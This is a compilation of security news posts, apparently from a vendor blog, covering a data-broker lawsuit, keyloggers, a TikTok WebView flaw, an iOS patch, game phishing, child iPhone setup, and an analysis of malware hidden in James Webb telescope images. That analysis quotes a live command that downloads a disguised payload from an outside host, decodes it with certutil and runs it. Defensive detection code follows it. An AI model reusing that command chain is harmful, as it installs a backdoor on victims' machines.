IT NEWS

Data broker sued for allegedly selling individuals’ sensitive location data

The Federal Trade Commission (FTC) has sued data broker Kochava for allegedly selling information that would allow for individuals’ whereabouts to be traced to sensitive locations. The information included location data from hundreds of millions of phones, including sensitive locations that could be tied to an individual.

And, while the name Kochava may not ring any bells, it actually has a sizeable footprint in the data collection industry. In its own words, Kochava is the industry leader for mobile app attribution and mobile app analytics, and its platform provides a comprehensive set of measurement and targeting tools for app marketers.

While we are all more or less aware that advertisers spend a lot of money to enhance their targeted advertising strategies, there are boundaries to what the FTC will allow.

Buy and sell

Kochava is a location data broker that provides precise geolocation data from consumers’ smartphones and also purchases similar data sets from other brokers in order to resell them to clients. These data feeds are often used by clients who want to analyze things like foot traffic at local stores or other locations. Not only does the data show the precise location of mobile devices, each location is also associated with a unique identifier, like a device ID, as well as other information, like an IP address, device type and more.

This means that an exact location can be traced back to a unique individual. Kochava even boasts that one of the possibilities of the datasets is to identify households, for example by tracking where the phones “stay at night”.

This is exactly one of the objections brought up by the FTC. The data is not anonymized and can be used to identify the mobile device’s user or owner. It is also possible because other data brokers specifically sell services that match Mobile Advertising IDs with offline information, like consumers’ names and physical addresses.

Sensitive locations

One of the restrictions the FTC takes a hard stance on is sensitive locations. As we can read in the complaint, the Federal Trade Commission filed the lawsuit against Kochava for selling geolocation data from hundreds of millions of mobile devices that can be used to trace the movements of individuals to and from sensitive locations.

As examples of sensitive locations the FTC lists:

  • reproductive health clinics
  • places of worship
  • homeless and domestic violence shelters
  • addiction recovery facilities

Having such information revealed could expose people to threats of stigma, stalking, discrimination, job loss, and even physical violence, the FTC explained. In an earlier article, we explained why Google has promised to delete location data of trips to sensitive locations.

Ruling to follow

The FTC is taking Kochava to court to protect people’s privacy and halt the sale of their sensitive geolocation information. Earlier this month, the FTC announced that it is exploring rules to crack down on harmful commercial surveillance practices that collect, analyze, and profit from information about people. The FTC files a complaint when it has reason to believe that the named defendants are violating or are about to violate the law and it appears to the Commission that a proceeding is in the public interest.

According to Kochava’s management

“this lawsuit shows the unfortunate reality that the FTC has a fundamental misunderstanding of Kochava’s data marketplace business and other data businesses. Kochava operates consistently and proactively in compliance with all rules and laws, including those specific to privacy.”

The case will be decided by the court. The complaint was filed in the U.S. District Court for the District of Idaho, where Kochava is based.

What is a keylogger?

A blog post published earlier this year posed the question “Is Grammarly a keylogger?” I have personally had people reference that post and ask me to add detection of Grammarly to Malwarebytes. The answer has always been, “no.” Whether or not you like what Grammarly does, Grammarly is not a keylogger, according to the way that term is used by the security industry.

This raises the question: exactly what is a keylogger, then?

A keylogger is anything that logs keystrokes, right?

Well, no. This is way too broad a definition, since there are countless programs installed on every computer on earth designed to capture and save your keystrokes. Any word processor, for example. For that matter, any productivity software, whether that be a word processor, a notepad, a spreadsheet, a slideshow app, etc. Even something as low level as a Terminal window will record everything you type in the command history.

Using a computer made in the last several decades is all about typing things in a keyboard, and some program doing something with all those button presses. There’s a tongue-in-cheek saying about a common piece of advice for avoiding phishing attacks: you can’t tell the user to stop clicking things on the thing-clicking machine. Similarly, if you’re going to blow the whistle at anything that captures your keystrokes, you’re fighting a losing battle.

Is it something that sends your keystrokes somewhere?

We’re getting closer, but still no. Think about the things you use every day. A web browser, for example. Every time you type a search in a browser, what you type is sent off to the search engine of your choosing (most likely Google). Plus, there are tons of websites that will save things you type on the server. Consider Google docs, for example. Everything you type in such a document in your browser gets sent off to Google.

The web browser isn’t the only guilty party, of course. Consider Apple’s Notes app. Depending on your settings, everything you type in the Notes app will be synced to iCloud. The same is true of Microsoft’s OneNote app. For that matter – again, depending on your settings – doing a Spotlight search on your Mac can send everything you type in the search bar to Apple.

This is clearly where Grammarly lies. It collects keystrokes and sends them off your device for the purpose of having their backend system check the grammar of what you typed. Would it be better if it could do all that on the device? Certainly, though I know nothing of the technical reasons why that decision was made. Would I personally use Grammarly? Not a chance. However, there are many people who need a grammar checker and like the features Grammarly offers.

Clearly, these things are all legitimate apps, offering legitimate functionality. This definition is still too broad to be useful.

Then what IS a keylogger?

A more useful definition would be:

A keylogger is a program that collects keystrokes and sends them to a third-party, solely for the benefit of that third-party.

The key differentiator between a keylogger and something more legitimate is that it’s not collecting your keystrokes for your benefit. Instead, someone else intends to use what you typed for some purpose of their own, nefarious or otherwise. However, within this definition, there are a few different types of keyloggers.

“Potentially unwanted” keyloggers

A keylogger may be identified as a “PUP” (which stands for “Potentially Unwanted Program”) if it’s software that is sold legally and openly. Such programs are often marketed as tools for monitoring your children or employees, and as such have a theoretical legitimate use. (I have some strongly negative opinions about the use of keylogging software for such purposes, but to each their own.)

However, such keyloggers are also very commonly misused. In reality, legitimate usage of such keyloggers is probably dwarfed by illegitimate usage. People with access to someone else’s device can install them without the owner’s knowledge for unsavory – even malicious – reasons. This is quite common with intimate partner abuse, stalking, workplace harassment, etc.

For this reason, most security software will detect these so-called “legitimate” keyloggers as PUPs. Malwarebytes, as a member of the Coalition Against Stalkerware, is certainly no exception.

Adware keyloggers

These keyloggers are things that collect keystrokes within certain contexts for the purposes of targeting you with ads, building a profile to better understand you as a target for ads, or as a means of better understanding the entire customer base. An example of the type of data that such a program might collect would be every search you enter in your browser and every site you visit (whether that’s by typing the address in the address bar or clicking a link). Such programs often go well beyond just logging keystrokes, and will collect things such as your browser history, browser of choice, software installed on your computer, your location, etc.

These programs will generally trick the user into installing them, using a variety of lures. The old fake Adobe Flash Player installer trick is one of the most common, even now, when Flash is long dead. Generally speaking, though, these are spread in the form of trojans, i.e. programs the user is tricked into downloading and running.

Such programs are either malware or just shy of malware, depending on your definition. Either way, they serve no legitimate purpose for anyone other than shady advertisers and deserve to be deleted with extreme prejudice. The only good news is that it is not the intent of these programs to harm you (though poor data handling practices by shady adware companies definitely could cause harm regardless of intent).

Malicious keyloggers

The most concerning category of keyloggers. These are the ones without any supposed “legitimate” purpose, and are intended for nothing but to steal your information. Such keyloggers are often used to collect sensitive information, such as account credentials, credit card numbers, social security numbers, and more.

Malicious keyloggers get onto your machine through a variety of means. They could be trojans, often using a lure more convincing than a fake Flash installer. They could infect your machine through a browser vulnerability that allows arbitrary code to execute. (This is less common on Macs than on Windows, but is nonetheless an increasing problem for Mac users.)

Such malware has also been installed manually, by attackers who have gained physical or remote access to the machine. In a well-known case, the creator of the FruitFly malware is known to have used passwords obtained from data breaches to gain access to victims’ Macs. He used a technique called “credential stuffing,” in which a password obtained from one online account is used to attempt to log in to something else. Since so many people reuse passwords, this is unfortunately a fairly reliable strategy.

In the case of malicious keyloggers, the software is rarely limited to just capturing keystrokes. Most malicious spyware has keylogging capabilities as only a part of the complete package, also including – among other things – file collection, capture of the screen contents, capture of video and audio via the webcam and microphone, and even execution of arbitrary commands. Thus, most such malware is not referred to as a “keylogger,” but rather is called “spyware.”

How do I protect myself from keyloggers?

Obviously, one way to do so is to use some kind of antivirus software, such as Malwarebytes. If you think you might be being targeted by someone using a PUP keylogger, make sure that the software you use detects such software. Membership in the Coalition Against Stalkerware would be a good indication of that.

You can avoid some of the common means that attackers may use to install a keylogger on your device by making sure you use a strong login password on your computer. Make sure it’s one that nobody could guess, and don’t leave your computer logged in and unattended. If you need to share your computer with someone, don’t let them use your account on the computer. Instead, create a separate account for that person and do not give them admin privileges. (On a Mac, this can be done in System Preferences -> Users & Groups.)

When it comes to the more malicious stuff, be careful about what you download. If a website tells you that you need to install something to see its content, or tells you that you’re infected and that you need to install something to fix it, run away screaming. (If you’re in a public place, you may want to consider just closing the browser window, though; otherwise you may get strange looks.)

It’s also critically important to keep your system up-to-date. Doing so ensures that your system is protected against known vulnerabilities that could be used to infect your device. On a Mac, go to System Preferences -> Software Update and check the box reading Automatically keep my Mac up to date.

Doing these things is never a guarantee, but they will go a long way towards reducing the chances of ever being affected by a keylogger.

TikTok vulnerability could have allowed hijackers to take over accounts

Microsoft has released a detailed rundown of an issue, now fixed, which was potentially dangerous for users of TikTok. The problem, flagged as a “high-severity vulnerability” by Microsoft, required several steps chained together in order to function. Attackers making use of it could have compromised accounts with one click.

From there, the standard rules of engagement for compromised accounts apply. Sending messages, uploading content, checking out sensitive information or looking at private videos; all of this and more would have been possible. Worse, Microsoft determined that both versions of the TikTok app on Android were vulnerable to this issue. That’s around 1.5 billion installations in total, so it’s just as well TikTok received word of the vulnerability in February of this year and it’s now fixed.

Shall we take a look?

What is a deeplink?

To ward off any possible confusion, deeplinks are completely unrelated to deepfakes.

This issue is pinned around TikTok’s deeplink verification. A deeplink is a URL that opens a specific screen inside an app rather than a page in the browser. As Engadget explains, tapping a Twitter embed in Chrome on mobile and having the Twitter app open is an example of this working in practice.

Where this goes wrong is when someone finds a way to bypass the app’s deeplink validation and make the app load URLs it was never meant to load. As it happens, our old friend JavaScript is what turns that into an account takeover.

The perils of JavaScript interface injection

Exploitation depended on how the app implemented JavaScript interfaces, which are exposed through WebView, the Android component apps use to load and display web pages. Loading untrusted content into a WebView that exposes such interfaces leaves the app open to what is known as JavaScript interface injection, which can lead to corrupted data, data leakage, and even arbitrary code execution.

Microsoft found that several of these issues, chained together with the handling of a specific deeplink, could force the app’s WebView to load arbitrary URLs.

The issue, now fixed, is tracked as CVE-2022-28799:

The TikTok application before 23.7.3 for Android allows account takeover. A crafted URL (unvalidated deeplink) can force the com.zhiliaoapp.musically WebView to load an arbitrary website. This may allow an attacker to leverage an attached JavaScript interface for the takeover with one click.

Fixes and suggestions

Microsoft has the following advice for app developers who need to use JavaScript interfaces:

  • Use the default browser to open URLs that don’t belong to the application’s approved list.

  • Keep the approved list up to date and track the expiration dates of the included domains. This can prevent attackers from hijacking WebView by claiming an expired domain on the approved list.

  • Avoid using partial string comparison methods to compare and verify a URL with the approved list of trusted domains.

  • Avoid adding stage or internal network domains to the approved list as these domains could be spoofed by an attacker to hijack WebView.
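To make the first three points concrete, here is an added example in Python (not Microsoft’s or TikTok’s code). It puts the substring check the advice warns against next to a routing function that parses the URL, accepts only an exact hostname match over https, and sends everything else to the default browser. The allowlist under example-app.com and the bypass URLs are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist for this example; a real app ships its own list of
# fully qualified hosts it is willing to render inside its WebView.
APPROVED_HOSTS = {"www.example-app.com", "m.example-app.com"}


def weak_is_trusted(url: str) -> bool:
    """The pattern the advice warns against: a partial string match on the raw URL.
    It accepts any URL that merely *mentions* the trusted domain."""
    return "example-app.com" in url


def route_url(url: str, approved: set = APPROVED_HOSTS) -> str:
    """Decide where a deeplink-supplied URL should open.

    Returns "webview" only when the URL is https and its parsed hostname is
    exactly one of the approved hosts; anything else returns "browser", i.e.
    hand it to the default browser, which has no JavaScript interface to abuse.
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:          # e.g. a malformed IPv6 literal
        return "browser"
    if parts.scheme != "https":
        return "browser"
    host = parts.hostname       # lowercased; port, userinfo and brackets removed
    if not host or parts.username is not None:
        return "browser"        # "https://www.example-app.com@evil.example/" lands here
    return "webview" if host in approved else "browser"


# Constructed attacker inputs; every one of them fools the substring check.
BYPASS_ATTEMPTS = [
    "https://evil.example/?next=example-app.com",   # trusted name in the query string
    "https://example-app.com.evil.example/",        # trusted name as a subdomain
    "https://www.example-app.com@evil.example/",    # trusted name as userinfo
    "http://www.example-app.com/",                  # plain http, open to tampering
]

if __name__ == "__main__":
    for u in ["https://www.example-app.com/profile"] + BYPASS_ATTEMPTS:
        print(f"{u:50} substring={weak_is_trusted(u)!s:5} route={route_url(u)}")
```

The same approach carries over to Kotlin or Java on Android: parse the URL, compare the host against the approved list, and never compare the raw string.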

It’s important to note that Microsoft has seen no evidence of this being exploited in the wild. There is no need for users to be panicking about this particular exploit. There are many threats out there for users of TikTok like phishing and social engineering. This one, however, can be set aside as a highly technical “close, but no cigar”.

Apple releases security update for iPhones and iPads to address vulnerability

Apple has released iOS 12.5.6, a security update for older iPhones and iPads that patches a remotely exploitable WebKit vulnerability allowing attackers to execute arbitrary code on unpatched devices.

The WebKit vulnerability, known as CVE-2022-32893, was fixed for iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1 on August 17, and for Safari on macOS Big Sur and macOS Catalina on August 18. This update brings the fix to older devices running iOS 12.

Zero-day?

Technically this is no longer a zero-day: by definition, a zero-day is a software vulnerability previously unknown to those who should be fixing it, such as the vendor of the targeted software. This vulnerability has been known and patched elsewhere for weeks, although users of older Apple OS versions had no patch available until now.

WebKit vulnerability

CVE-2022-32893 is an out-of-bounds write issue that was addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution. An attacker could lure a potential victim to a specially crafted website or use malvertising to compromise a vulnerable system by exploiting this vulnerability. The vulnerability exists in Apple’s HTML rendering software, WebKit, which powers all iOS web browsers and Safari, so possible targets are iPhones, iPads, and Macs which could all be tricked into running unauthorized code.

Apple has already said it’s aware of a report that the issue may have been actively exploited.

Not vulnerable

Apple notes in the security update for CVE-2022-32893 that iOS 12 is not affected by CVE-2022-32894. As we mentioned in our post about the two actively exploited zero-days, it seems likely that these vulnerabilities were found in an active attack that chained the two together, for example via a watering hole or as part of an exploit kit: CVE-2022-32893 would be used to get initial code running, and that code would then leverage CVE-2022-32894 to obtain kernel privileges. This does not mean the WebKit vulnerability is harmless on devices that are not vulnerable to CVE-2022-32894, as it could be chained with another vulnerability to obtain higher privileges.

Mitigation

Other than confirming that the exploit has been used in the wild, Apple has not released any specifics about the vulnerability. Both vulnerabilities are on CISA’s list of known exploited vulnerabilities, with a deadline to patch of September 8.

Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6.

Stay safe, everyone!

Final Fantasy 14 players targeted by QR code phishing

Final Fantasy 14, the smash-hit online role playing game, is under fire from scammers. The attack is a devious way to try and compromise player accounts, making use of free item promises and bogus QR codes.

As the game is a constantly changing service, it’s almost impossible to keep up with new features, offers, and content. The developers announce these changes on their blog, The Lodestone. What’s being talked about at the moment is the QR code-centric phishing attack.

The developers write:

As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth.

Please also be aware of the following methods used to direct players to fake pages:

・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums.

・Including a QR code in an image disguised as an official Twitter or forum post, and scanning the QR code displays fake pages.

・Disguising as a FFXIV game play video with a link to fake pages as part of the video or in the description.

Before opening any URLs, we urge you to confirm that they are legitimate and not a fraudulent imitation.

How the QR code phish attack works

Thanks to players grabbing screenshots, we can show you what these attacks typically look like.

Scammers send direct messages (tells) to other players. Many of the accounts sending these messages appear to have been hijacked themselves. A link is sent to the victim, directing them away from the game to image hosting services.

What waits for them is a screenshot of a faked Tweet from the official Final Fantasy 14 account.

It reads as follows:

We’ve decided to sneak another mount into the 6.2 release. Scan the QR code to automatically add the mount. This mount is only available until 4th September, after this date the mount will become tradeable and will be the only way to own this, so claim it now.

Mounts, pets, and other in-game items can be quite expensive. As a result, any promise of free items will no doubt catch some attention. Scanning the QR code will take the would-be item grabber to a fake login portal. Once the account is stolen, the scammers are free to use it to continue the phishing antics. Gaming accounts with a lot of in-game funds or items attached are of course very valuable. Depending on the game and how trading works, they may sell the account, or items, or trade other content. Final Fantasy 14 players are also at risk due to the perils of Real Money Trading. Often, phishing feeds into this activity too.

Avoiding the scam

In terms of bogus websites, Square Enix has this advice:

The Square Enix Account Management System complies with EV SSL certification. Should a website ask for your Square Enix Account information, please make sure that the website is legitimate before entering any information. On certain web browsers, the address bar will display an icon indicating the website’s security certificate. On a legitimate Square Enix Account Management System login page, clicking this security icon will display references to “SQUARE ENIX CO., LTD.”

* On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password.

Examples of characteristics used in phishing URLs:

* The “s” is missing from “https” in the URL of the login page. The fake website will display http:// in the URL.

* The hyphen symbol is missing from “square-enix.” The fake website will display variations of “squareenix” in the URL.

* The letter “i” is replaced with various characters like “l” or “j.” The fake website will display “square-enlx” or “square-enjx.”

* The “com” in “square-enix.com” is replaced by various domains.
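The four URL characteristics in the advice above can be turned into a simple checker. The following is an added example, not Square Enix’s own tooling: the official domain square-enix.com comes from the advisory, the sample URLs are constructed, and the checker only looks for the four listed tricks, so an empty result is not proof that a page is genuine.

```python
from urllib.parse import urlsplit

BRAND = "square-enix"               # registrable name taken from the advisory
LEGIT_HOST = BRAND + ".com"


def homoglyph_normalize(label: str) -> str:
    """Undo the letter swaps the advisory lists ("i" written as "l" or "j") so that
    square-enlx and square-enjx compare equal to square-enix."""
    return label.replace("l", "i").replace("j", "i")


def classify_login_url(url: str) -> list:
    """Return the suspicious traits found in a login URL, based only on the four
    characteristics in the advisory. An empty list means none of those four
    tricks were spotted, not that the page is genuine."""
    findings = []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        findings.append("no https")
    labels = host.split(".")
    if len(labels) < 2:
        findings.append("no registrable domain")
        return findings
    sld, tld = labels[-2], labels[-1]           # e.g. ("square-enix", "com")
    core = homoglyph_normalize(sld)
    if core in (BRAND, BRAND.replace("-", "")):
        if core != sld:
            findings.append(f"lookalike letters in {sld!r}")
        if "-" not in core:
            findings.append(f"missing hyphen in {sld!r}")
        if tld != "com":
            findings.append(f"unexpected TLD {tld!r}")
    elif BRAND in host:
        findings.append(f"brand name used as a subdomain of {sld}.{tld}")
    else:
        findings.append(f"host {host!r} is not {LEGIT_HOST}")
    return findings


# Constructed sample URLs modelled on the advisory's patterns, not real phishing sites.
SAMPLES = [
    "https://secure.square-enix.com/account/app/svc/login",
    "http://secure.square-enix.com/account/app/svc/login",
    "https://squareenix.com/login",
    "https://square-enlx.com/login",
    "https://square-enix.net/login",
    "https://square-enix.com.example.net/login",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u:55} {classify_login_url(u) or 'no red flags'}")
```

The last sample shows a trick the advisory does not list but that follows the same idea: the real domain placed in front of an attacker-controlled one, which only the right-hand end of the hostname reveals.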

Note that current versions of Chrome and Firefox no longer show the certificate holder’s name in the address bar, so you may need to click through to the certificate details to see the “SQUARE ENIX CO., LTD.” reference. In terms of additional account security, you can make use of a One Time Password to further bolster your defences. This can be done via an app, or through a physical hardware token.

QR code scams are very popular in Final Fantasy land, and you can bet they’ll come back around in another form in the near future.

Stay safe out there!

How to set up an iPhone for your kids

Thanks to Thomas Reed for his expertise and guidance.

This is it.

After much hemming and hawing, you’ve finally given in and bought your child their first smartphone, which you plan to give to them before the school year starts.

But before you give it to them, it’s worth sitting them down to talk to them about things like what apps and sites they shouldn’t use or visit, what online behaviors to avoid engaging in, and what scams they need to look out for. There are also a few easy things you can do to the iPhone itself to make things a bit safer. Here are our suggestions:

Secure the iPhone

Often, when we think of protecting and securing, we also think of the worst-case scenarios. When it comes to smartphones, that means losing them or having them stolen. Make sure the phone is locked whenever it’s unattended or not in use.

Help your child choose a passcode for their iPhone that they can remember. Also set up an alternative way to unlock the phone using your own biometrics (Face ID or Touch ID), so you can get in during an emergency.

While we’re on the subject of losing phones, also make sure you—

Enable the Find My feature

That’ll make finding missing phones simpler and easier. You can find the step-by-step process here on Apple’s official site.

If you want to keep track of your child at necessary times, you can also use location sharing in Find My (formerly Find My Friends). Just make sure that you talk to your child about using this first. If you have young adults, use the feature only with their permission.

Set up your child’s own Apple ID

If a child is going to have their own iPhone, they should have and use their own Apple ID, too.

After creating your child’s Apple ID, enable two-factor authentication (2FA) for that added layer of security, ensuring that your child’s account won’t get popped easily even if someone got hold of their password.

Note that your child’s iCloud account is automatically created along with their Apple ID. Depending on how heavily they use this feature, you might want to consider purchasing a subscription that grants them some extra online storage. Maybe not now, but in the future.

Having an iCloud account benefits your child more than not having one. When they get older, they may also want to use their account on an iPad or want a newer phone model. An iCloud account makes this easier, but remember that having data in the cloud also has security and privacy risks attached to it.

Once your child has an Apple ID, you can set up Family Sharing on their device. By using this feature, you can not only hand pick what content to share with members of the family but also control the buying and downloading of games, ebooks, and apps on their device wherever you are.

Disable or hide features you deem off-limits or unnecessary

iPhones have features that young kids can use, and there are some that they just shouldn’t touch at all until they’re old enough or you explicitly give them permission to use.

Ideally, we don’t want our kids fiddling with Screen Time as there are lots of settings in there that they will just gladly change based on their preference. These settings include (among others):

  • Content restrictions on Safari
  • iTunes and App Store purchases
  • Siri and Dictation
  • Privacy settings (includes location services)

You can secure Screen Time by creating a passcode for it. Make sure you use a passcode that’s different from other passcodes you help set up with your child.

Depending on your child’s age, mental and emotional maturity, and how you want them to use their device, feel free to add more or remove some from the list above. For example, if your child is 10 or 11, you might want to hide the email feature for now until they’re a bit older. Remember, what you disable or hide should be non-negotiable… at least until a later date, when you can review, assess, and adjust the above accordingly.

Limit or restrict features they can use

This is probably the hard part since your child is likely to have different views from you on what they should be allowed to do on their phone. When it comes to having social networking accounts, for instance, you may want to delay this for a few more years, even if the platform allows 13-year-old kids to use it.

Being in social networks at a young age is risky for children. Child predators camp on there, and not every piece of content shared within these environments is child-friendly. One study even showed that, apart from giving kids a different or unhealthy view of the real world, young children who are on TikTok began developing tics and having tic-like attacks brought about by anxiety and stress. They may also begin showing signs of mental health issues. 

As a parent or guardian, you can also limit screen time, which is easy to do through the iPhone’s Family Sharing feature. Apple has a guide on how to set this up as well.

If your child is into playing games on their iPhone, you might want to tweak the Game Center settings so they’re not exposed to potential risks needlessly. iOS can restrict adding friends, playing multiplayer games, and sending private messages (among other things) in Game Center.

The iPhone also has Guided Access that you can customize to put more limitations, such as limiting how long your child uses an app.

Do you have an old iPhone you want to hand down to your child instead of buying a new one? Make sure your files are properly backed up in iCloud, then you can wipe your data from the phone by performing a factory reset.

Final thoughts

Giving your kids a new smartphone doesn’t mean that you’re giving them free rein to do what they want with it. Walking them through the setup process and talking with them about what’s acceptable and what’s not, while also giving them an opportunity to speak up, is a good way of showing, and reminding, your kids that, at the end of the day, you, the parent or guardian, are the boss.

You don’t even have to tell them that.

James Webb telescope images used to hide malware

An unusual approach to spreading malware, which rides on the popularity of the James Webb telescope images, has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. The attachment pulls in an external template file, and like a traditional macro document that template contains VBA code that starts the first stage of the attack once the user enables macros. Through several steps, the actual payload turns out to be a Golang binary that acts as a backdoor.

Golang

Go, often called Golang, is an open source programming language. Some threat actors have started writing malicious code in cross-platform languages like Go, Python, and Rust, with the aim of reaching (and, in the case of ransomware, encrypting) as many systems as possible. One code base lets their malware run on many combinations of operating systems and architectures.

VBA Macro

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open, AutoOpen, and AutoExec. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe /c cd c:\users\{username}\appdata\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

[Image: oxb36f8geec634.jpg as displayed by an image viewer]

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command above we saw how the legitimate certutil.exe was used to decode the so-called certificate into a binary called msdllupdate.exe.
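As an added illustration (not code from the original write-up), here is a Python check a defender can run over a suspect image file: it reports whether bytes follow the JPEG end-of-image marker and whether any Base64 "certificate" block of the kind certutil -decode accepts decodes to a PE (MZ) file. The sample image is constructed here; the BEGIN/END CERTIFICATE markers and the block sitting after the picture data are assumptions about the campaign file's layout.

```python
import base64
import re

# What certutil -decode accepts: a Base64 body between BEGIN/END markers. The CERTIFICATE
# markers are an assumption about this campaign's file; the write-up only says the Base64
# was "disguised as an included certificate".
CERT_BLOCK = re.compile(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image; bytes after the last EOI are not picture data

# A minimal (constructed) JPEG: SOI, a bare JFIF APP0 segment, EOI.
CLEAN_JPEG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + JPEG_EOI

def inspect_jpeg(data: bytes) -> dict:
    """Report trailing data and Base64 'certificate' blocks that decode to a PE (MZ) file."""
    result = {"is_jpeg": data.startswith(JPEG_SOI), "trailing_bytes": 0,
              "cert_blocks": 0, "decoded_pe": False}
    eoi = data.rfind(JPEG_EOI)          # Base64 is ASCII, so the last FF D9 is the real EOI
    if eoi != -1:
        result["trailing_bytes"] = len(data) - (eoi + len(JPEG_EOI))
    for match in CERT_BLOCK.finditer(data):
        result["cert_blocks"] += 1
        body = re.sub(rb"\s+", b"", match.group(1))   # strip line wrapping
        try:
            blob = base64.b64decode(body, validate=True)
        except ValueError:                            # binascii.Error is a ValueError
            continue
        if blob.startswith(b"MZ"):                    # DOS/PE header: not a certificate
            result["decoded_pe"] = True
    return result

def build_sample() -> bytes:
    """Constructed stand-in for the campaign's JPEG: picture first, then a fake PE (an MZ
    header plus filler, not a real binary) wrapped in certificate markers and line-wrapped."""
    fake_pe = b"MZ" + b"\x00" * 62 + b"constructed filler, not executable code"
    wrapped = base64.encodebytes(fake_pe)             # 76-column lines, trailing newline
    return (CLEAN_JPEG + b"\r\n-----BEGIN CERTIFICATE-----\r\n" + wrapped
            + b"-----END CERTIFICATE-----\r\n")

if __name__ == "__main__":
    print(inspect_jpeg(build_sample()))   # constructed sample: cert_blocks=1, decoded_pe=True
    print(inspect_jpeg(CLEAN_JPEG))       # clean image: trailing_bytes=0, cert_blocks=0
```

A real certificate block decodes to DER (starting with 0x30), so a block whose decoded bytes start with MZ is the signal worth alerting on, independent of the file extension.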

Payload

The malware payload copies itself into %localappdata%\microsoft\vault and creates and executes a batch file called update.bat in the same folder. The .bat file creates the directory %LOCALAPPDATA%\microsoft\windows\MsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

  • sleep changes the timeout between C2 requests
  • timeout changes the timeout parameter of the nslookup request
  • any other command is executed with “cmd.exe /c”

Basically this allows the threat actor to execute arbitrary code on the affected machine.
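Added example, not the vendor's detection logic: three process-creation rules derived from the chain described above (Office spawning a cmd.exe that runs curl or certutil, certutil -decode fed an image file, and the dropped binary spawning cmd.exe or nslookup from its drop folders), run over constructed events. The event schema, user path and download host are placeholders.

```python
import re
from typing import Optional

# Rule inputs come from the behaviour described above; rule labels are this example's own.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DROP_DIRS = ("\\microsoft\\vault\\", "\\microsoft\\windows\\mssafety\\")   # from the write-up
DECODE_IMAGE = re.compile(r"-decode\s+\S+\.(jpe?g|png|gif|bmp)\b", re.I)  # certutil input file
DOWNLOAD_TOOLS = re.compile(r"\b(curl|certutil)\b", re.I)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def check_event(ev: dict) -> Optional[str]:
    """Return a finding label for one process-creation event, or None if no rule fires."""
    child, parent = basename(ev["image"]), basename(ev["parent"])
    if parent in OFFICE_APPS and child == "cmd.exe" and DOWNLOAD_TOOLS.search(ev["cmdline"]):
        return "office-spawns-downloader"
    if child == "certutil.exe" and DECODE_IMAGE.search(ev["cmdline"]):
        return "certutil-decodes-image"
    if child in {"cmd.exe", "nslookup.exe"} and any(d in ev["parent"].lower() for d in DROP_DIRS):
        return "dropped-binary-spawns-shell"
    return None

def scan(events: list) -> list:
    """Return (index, label) pairs for every event a rule fires on."""
    return [(i, label) for i, ev in enumerate(events) if (label := check_event(ev)) is not None]

# Constructed sample events; the user name and the download host are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c cd c:\users\alice\appdata\local & curl http://placeholder.invalid/a.jpg"
                r" -o a.jpg & certutil -decode a.jpg msdllupdate.exe & msdllupdate.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -decode a.jpg msdllupdate.exe"},
    {"parent": r"C:\Users\alice\AppData\Local\microsoft\windows\MsSafety\msdllupdate.exe",
     "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -timeout=5 placeholder.invalid"},
    {"parent": r"C:\Windows\explorer.exe",            # benign control event
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for index, label in scan(SAMPLE_EVENTS):
        print(index, label)   # three findings; the notepad event is not reported
```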

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

Malwarebytes blocks Generic.Malware

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes receives highest rankings in recent third-party tests

